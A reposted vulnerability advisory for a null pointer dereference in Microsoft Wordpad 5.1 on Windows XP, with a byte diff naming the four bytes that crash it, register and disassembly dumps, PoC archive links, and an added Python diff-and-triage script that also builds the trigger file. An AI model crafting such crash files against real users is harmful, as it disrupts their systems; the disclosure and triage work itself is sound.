Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Vulnerability

Reported by RootType, 01 Jul 2014 00:00:00. Source: seebug (www.seebug.org)

Microsoft Wordpad 5.1 Null Pointer Vulnerability in .doc format on Windows XP SP

Code

Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Vulnerability
Found by condis

Tested on Windows XP SP 3 Professional PL
MS Wordpad 5.1 (Compilation 2600.xpsp.080413-2111 SP 3)

This is not the bug from CVE-2009-0259.

$ Binary diff of the template file (a proper empty .doc document) and the malformed file
(showing only the offset that differs):

0000 1200: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 -- template file
0000 1200: 00 00 00 00 00 00 63 6F  6E 64 00 00 00 00 00 00 -- proof of concept

It (almost) does not matter which 4 bytes are placed there, as long as they are not 0x00.

Access violation when reading [00000004]

$ Registers:

eax = 020ebb72 ebx = 00000000 ecx = 020ebb7c edx = 00090608 
esi = 00000000 edi = 01bc04a8 eip = 01b9dbbb esp = 0177f5c8 
ebp = 0177f5cc 

$ Function dump:

01b9dbb4 55              push    ebp
01b9dbb5 8bec            mov     ebp,esp
01b9dbb7 56              push    esi
01b9dbb8 8b7508          mov     esi,dword ptr [ebp+8]
01b9dbbb 807e0400        cmp     byte ptr [esi+4],0         ds:0023:00000004=?? ; ---- crash
01b9dbbf 751b            jne     mswrd8+0x1dbdc (01b9dbdc)
01b9dbc1 8b06            mov     eax,dword ptr [esi]
01b9dbc3 57              push    edi
01b9dbc4 8b78fc          mov     edi,dword ptr [eax-4]
01b9dbc7 57              push    edi
01b9dbc8 ff156010b801    call    dword ptr [mswrd8+0x1060 (01b81060)]
01b9dbce 57              push    edi
01b9dbcf ff157410b801    call    dword ptr [mswrd8+0x1074 (01b81074)]
01b9dbd5 56              push    esi
01b9dbd6 e87bfdffff      call    mswrd8+0x1d956 (01b9d956)
01b9dbdb 5f              pop     edi
01b9dbdc 5e              pop     esi
01b9dbdd 5d              pop     ebp
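The register dump and disassembly above explain the fault: the function loads its first argument into esi (`mov esi, dword ptr [ebp+8]`), esi is 0, and `cmp byte ptr [esi+4], 0` therefore reads address 0x00000004, which is the "Access violation when reading [00000004]". The analysis itself rests on a byte-level diff of a known-good template against the crashing sample. The script below is an added example (not the advisory author's tool and not from the PoC archive): it reproduces that diff in the row format the advisory prints, lists the individual offsets that changed, and offers a triage check that flags a sample whose bytes at the advisory's window are non-zero where the template has zeros. It assumes the row label "0000 1200" is the file offset 0x1200 (so the changed bytes are 0x1206-0x1209), and the two inputs are constructed all-zero stand-ins rather than real .doc files.

```python
"""Byte-level diff of a template file against a sample, plus a triage check
for the 4-byte window described in the advisory.

Added example; assumptions are marked in comments.
"""
import sys

ROW = 16                 # bytes per printed row, as in the advisory's dump
SUSPECT_OFFSET = 0x1206  # assumption: row "0000 1200", bytes 6..9 of that row
SUSPECT_LEN = 4          # the advisory says 4 non-zero bytes trigger the crash


def hexdump_row(offset: int, chunk: bytes) -> str:
    """Format one 16-byte row as the advisory does:
    'hhhh hhhh: xx xx xx xx xx xx xx xx  xx xx xx xx xx xx xx xx'
    (offset split into two 16-bit halves, double space after 8 bytes)."""
    left = " ".join(f"{b:02X}" for b in chunk[:8])
    right = " ".join(f"{b:02X}" for b in chunk[8:])
    return f"{offset >> 16:04X} {offset & 0xFFFF:04X}: {left}  {right}"


def diff_rows(template: bytes, sample: bytes):
    """Yield (offset, template_row, sample_row) for each 16-byte row that
    differs. Unequal lengths are handled: a row missing from one file is
    compared as a shorter slice and therefore shows up as a difference."""
    length = max(len(template), len(sample))
    for off in range(0, length, ROW):
        t = template[off:off + ROW]
        s = sample[off:off + ROW]
        if t != s:
            yield off, hexdump_row(off, t), hexdump_row(off, s)


def changed_offsets(template: bytes, sample: bytes) -> list:
    """Return every individual byte offset at which the two files differ.
    Bytes present in only one file count as differences."""
    length = max(len(template), len(sample))
    out = []
    for i in range(length):
        t = template[i] if i < len(template) else None
        s = sample[i] if i < len(sample) else None
        if t != s:
            out.append(i)
    return out


def nonzero_in_window(sample: bytes, offset: int = SUSPECT_OFFSET,
                      length: int = SUSPECT_LEN) -> bool:
    """Triage check: True when the sample carries any non-zero byte in the
    window the advisory identifies. A file shorter than the window cannot
    match and returns False."""
    window = sample[offset:offset + length]
    return len(window) == length and any(window)


# Constructed stand-ins (not the real .doc files): an all-zero "template" and a
# copy with the advisory's bytes 63 6F 6E 64 ("cond") written at 0x1206.
TEMPLATE = bytes(0x1400)
_poc = bytearray(TEMPLATE)
_poc[SUSPECT_OFFSET:SUSPECT_OFFSET + SUSPECT_LEN] = b"cond"
POC = bytes(_poc)


def report(template: bytes, sample: bytes) -> str:
    """Render the diff rows plus the triage verdict as one printable string."""
    lines = []
    for off, t_row, s_row in diff_rows(template, sample):
        lines.append(f"{t_row} -- template file")
        lines.append(f"{s_row} -- sample")
    lines.append(f"changed offsets: {[hex(o) for o in changed_offsets(template, sample)]}")
    lines.append(f"non-zero bytes in advisory window: {nonzero_in_window(sample)}")
    return "\n".join(lines)


if __name__ == "__main__":
    # Usage: python diff_doc.py template.doc sample.doc
    # Without arguments the constructed stand-ins above are compared.
    if len(sys.argv) == 3:
        with open(sys.argv[1], "rb") as f1, open(sys.argv[2], "rb") as f2:
            print(report(f1.read(), f2.read()))
    else:
        print(report(TEMPLATE, POC))
```

Run against the constructed inputs, `report` prints exactly the two rows shown in the advisory's diff, lists 0x1206 through 0x1209 as the changed offsets, and reports the window as non-zero; pointing it at a real template and a suspect file gives the same triage output for that pair.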

$ 'O, hai' goes to Echo, Varseand, cxecurity and madcow ;3

$ Below you should see links to the attachment with the PoC:

http://cond.psychodela.pl/d/ms-wordpad-nullptr.rar
http://www.exploit-db.com/sploits/18952.rar



Vulners AI Score: 7.1 / 10 (High risk)